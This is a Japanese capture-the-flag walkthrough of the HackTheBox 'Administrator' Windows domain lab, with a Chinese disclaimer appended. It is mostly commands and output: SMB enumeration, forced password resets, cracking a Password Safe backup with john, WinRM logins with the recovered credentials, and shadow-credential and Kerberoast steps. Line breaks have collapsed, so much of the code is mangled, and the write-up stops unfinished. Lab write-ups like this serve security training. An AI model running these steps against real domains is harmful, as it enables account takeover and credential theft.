マシン情報
実際のWindows浸透テストと同様に、次のアカウントの認証情報を使用して管理者ボックスを起動します:ユーザー名:Oliviaパスワード:ichliebedich
マシンIPアドレス
10.10.11.42
スキャナマシンポート
1
|
nmap -p- -T4 10.10.11.42 -Pn
|
結果:
1234567891011121314151617181920212223242526 |
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2024-12-02 03:37 ESTInitiating Parallel DNS resolution of 1 host. at 03:37Completed Parallel DNS resolution of 1 host. at 03:37, 0.00s elapsedInitiating SYN Stealth Scan at 03:37Scanning 10.10.11.42 [65535 ports]Discovered open port 53/tcp on 10.10.11.42Discovered open port 135/tcp on 10.10.11.42Discovered open port 139/tcp on 10.10.11.42Discovered open port 21/tcp on 10.10.11.42Discovered open port 445/tcp on 10.10.11.42SYN Stealth Scan Timing: About 4.78% done; ETC: 03:48 (0:10:17 remaining)Discovered open port 49667/tcp on 10.10.11.42SYN Stealth Scan Timing: About 5.24% done; ETC: 03:56 (0:18:23 remaining)Increasing send delay for 10.10.11.42 from 0 to 5 due to max_successful_tryno increase to 5SYN Stealth Scan Timing: About 5.45% done; ETC: 04:05 (0:26:18 remaining)Increasing send delay for 10.10.11.42 from 5 to 10 due to max_successful_tryno increase to 6Warning: 10.10.11.42 giving up on port because retransmission cap hit (6).SYN Stealth Scan Timing: About 6.08% done; ETC: 04:10 (0:31:08 remaining)Discovered open port 58139/tcp on 10.10.11.42Discovered open port 53482/tcp on 10.10.11.42SYN Stealth Scan Timing: About 7.20% done; ETC: 04:13 (0:33:05 remaining)SYN Stealth Scan Timing: About 8.98% done; ETC: 04:16 (0:35:07 remaining)Discovered open port 49668/tcp on 10.10.11.42SYN Stealth Scan Timing: About 10.00% done; ETC: 04:18 (0:37:03 remaining)Discovered open port 593/tcp on 10.10.11.42 |
コンピュータ情報はアカウントを提供し、SMBとユーザーにスキャンしようとします
123456789101112131415 |
└─# crackmapexec smb 10.10.11.42 -u Olivia -p 'ichliebedich' --users 3 ⚙SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)SMB 10.10.11.42 445 DC [+] administrator.htbOlivia:ichliebedich SMB 10.10.11.42 445 DC [+] Enumerated domain user(s)SMB 10.10.11.42 445 DC administrator.htbfoobanizer badpwdcount: 1 desc: SMB 10.10.11.42 445 DC administrator.htbemma badpwdcount: 1 desc: SMB 10.10.11.42 445 DC administrator.htbalexander badpwdcount: 1 desc: SMB 10.10.11.42 445 DC administrator.htbethan badpwdcount: 1 desc: SMB 10.10.11.42 445 DC administrator.htbemily badpwdcount: 0 desc: SMB 10.10.11.42 445 DC administrator.htbbenjamin badpwdcount: 0 desc: SMB 10.10.11.42 445 DC administrator.htbmichael badpwdcount: 0 desc: SMB 10.10.11.42 445 DC administrator.htbolivia badpwdcount: 0 desc: SMB 10.10.11.42 445 DC administrator.htbkrbtgt badpwdcount: 1 desc: Key Distribution Center Service AccountSMB 10.10.11.42 445 DC administrator.htbGuest badpwdcount: 1 desc: Built-in account for guest access to the computer/domainSMB 10.10.11.42 445 DC administrator.htbAdministrator badpwdcount: 1 desc: Built-in account for administering the computer/domain |
マシン情報アカウントでWinrmにログインする
1
|
evil-winrm -u Olivia -p 'ichliebedich' -i 10.10.11.42
|
netexecを使用してドメインブラッドハウンド情報を収集する
1
|
netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
|
だから私たちは変えることができます
マイケル
パスワード
12345678 |
*Evil-WinRM* PS C:UsersoliviaDocuments> net user michael 123456net.exe : The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. + CategoryInfo : NotSpecified: (The password do...y requirements.:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandErrorMore help is available by typing NET HELPMSnet user michael aA123456The command completed successfully. <----------------*Evil-WinRM* PS C:UsersoliviaDocuments> |
michaelユーザーにログインし、benjaminパスワードを変更する
12 |
net rpc password benjamin Password123! -U administrator.htb/michael%Password123! -S 10.10.11.42ftp 10.10.11.42 |
ここで、benjaminパスワードを変更し、benjaminユーザー名とパスワードを使用してFTPに直接ログインします
Backup.psafe 3ファイルが入っています、わかりました!
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263 |
#!/usr/bin/env python# pwsafe2john processes input Password Safe files into a format suitable# for use with JtR.## This software is Copyright (c) 2012, Dhiru Kholia <dhiru at openwall.com>,# and it is hereby released to the general public under the following terms:## Redistribution and use in source and binary forms, with or without# modification, are permitted.## Password Safe file format is documented at,# http://keybox.rubyforge.org/password-safe-db-format.html## formatV3.txt at http://passwordsafe.svn.sourceforge.net/viewvc/passwordsafe/trunk/pwsafe/pwsafe/docs/## Output Format: filename:$passwordsaf$*version*salt*iterations*hash */magic = "PWS3"import sysimport structfrom binascii import hexlifyimport osdefprocess_file(filename): f = open(filename, "rb") data = f.read(4)if data != magic: sys.stderr.write("%s : PWS3 magic string missing, is this a Password Safe file?n", filename)return buf = f.read(32)iflen(buf) != 32: sys.std.write("Error: salt read failed.n")return iterations = struct.unpack(">I", f.read(4))[0] sys.stdout.write("%s:$pwsafe$*3*" % os.path.basename(filename).rstrip(".psafe3")) sys.stdout.write(hexlify(buf)) sys.stdout.write("*%s*" % iterations) hsh = f.read(32)iflen(hsh) != 32: sys.stderr.write("Error: hash read failed.n")return sys.stdout.write(hexlify(hsh)) sys.stdout.write("n") f.close()if __name__ == "__main__":iflen(sys.argv) < 2: sys.stdout.write("Usage: pwsafe2john [.psafe3 files]n") sys.exit(-1)for i inrange(1, len(sys.argv)): process_file(sys.argv[i]) |
スクリプトまたは実行コマンドを使用してファイルを解読し、Backup.psafe 3パスワードを取得できます
12 |
pwsafe2john Backup.psafe3Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050 |
このハッシュを解く
12345678910 |
┌──(root??Bill-Gates)-[~/Desktop/HackTheBox-VPN]└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 127 ?Using default input encoding: UTF-8Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])Cost 1 (iteration count) is 2048 for all loaded hashesPress 'q' or Ctrl-C to abort, almost any other key for statustekieromucho (Backu) 1g 0:00:00:00 DONE (2024-12-02 08:28) 2.325g/s 11088p/s 11088c/s 11088C/s venus..1029384756Use the "--show" option to display all of the cracked passwords reliablySession completed. |
バックアップを開くと、3つのアカウントを見つけることができます
123 |
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Swemily:UXLCI5iETUsIBoFVTj8yQFKoHjXmbemma:WwANQWnmJnGV07WQN8bMS7FMAbjNur |
emilyアカウントを使用してログインできます
1
|
evil-winrm -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -i 10.10.11.42
|
見つけるユーザーに旗を立てる
1
|
c0ac1ee1e798423fe9001e225cc343f3
|
123456789101112 |
└─# pywhisker -d 10.10.11.42 -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target ethan --action "add" [*] Searching for the target account[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb[*] Generating certificate[*] Certificate generated[*] Generating KeyCredential[*] KeyCredential generated with DeviceID: 2c3fc5be-9540-8af3-44bc-2079d57b2410[*] Updating the msDS-KeyCredentialLink attribute of ethan[+] Updated the msDS-KeyCredentialLink attribute of the target object[+] Saved PFX (#PKCS12) certificate & key at path: ur15yRu5.pfx[*] Must be used with password: 9N0klMy2fgOGcAeMyPtD[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools |
TGTキーを出力
1
|
targetedKerberoast.py -v -d '10.10.11.42' -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
|
終了していません:)
我觉得我的公众号文章需要排版,有推荐的网站或工具吗?
原文始发于微信公众号(Gh0xE9):Administrator 靶机实战 - 本文章出自宇宙最强最牛最厉害最屌最强悍最能赚钱的理塘最強伝説と絕兇の猛虎純真丁一郎です
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论